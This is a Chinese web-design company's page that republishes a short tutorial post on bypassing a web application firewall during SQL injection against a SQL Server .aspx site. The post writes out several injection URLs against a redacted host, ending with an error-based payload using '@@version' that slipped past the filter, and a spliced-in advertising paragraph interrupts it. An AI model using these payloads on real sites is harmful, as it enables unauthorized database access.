网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

一个非常简单的WAF绕过。。

0x00 前言


确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...

创新互联建站是专业的秀峰网站建设公司,秀峰接单;提供成都网站设计、成都网站建设,网页设计,网站设计,建网站,PHP网站建设等专业做网站服务;采用PHP框架,可快速的进行秀峰网站开发网页制作和功能扩展;专业做搜索引擎喜爱的网站,专业的做网站团队,希望更多企业前来合作!

0x01 起因


工具扫到了一个有sqlserver特性的站点
一个非常简单的WAF绕过。。
通常出现这种错误信息,说明该站点配置不当,错误信息会直接显示,也没用强制类型转换的信息,那么一般就有报错型注入了!来检测一下
一个非常简单的WAF绕过。。
却出现了WAF的信息

0x02 fuzz


遇到WAF首先得先看看是什么关键字触发了拦截请求,所以我们先进行简单的调试

http://xxxx/xxxx.aspx?xxxx=1' and --a

一个非常简单的WAF绕过。。
语法出错是很正常的,因为我们添加了and且后面没任何值,所以我们可以假设语句变成了

select xxx from xxx where xxxx=1' and --a

但我们发现其实并没有触发WAF,说明and关键字并没有在过滤的列表当中,继续尝试

http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a

一个非常简单的WAF绕过。。
竟然触发了WAF,经过多次调试,发现是and后面居然不能带数字。。这样就不会报错了

http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a

一个非常简单的WAF绕过。。
那么再次尝试下原来的代码,将顺序调整,成功!

http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a

一个非常简单的WAF绕过。。

一个非常简单的WAF绕过。。


网站标题:一个非常简单的WAF绕过。。
网站地址:http://bjjierui.cn/article/ipsspj.html

其他资讯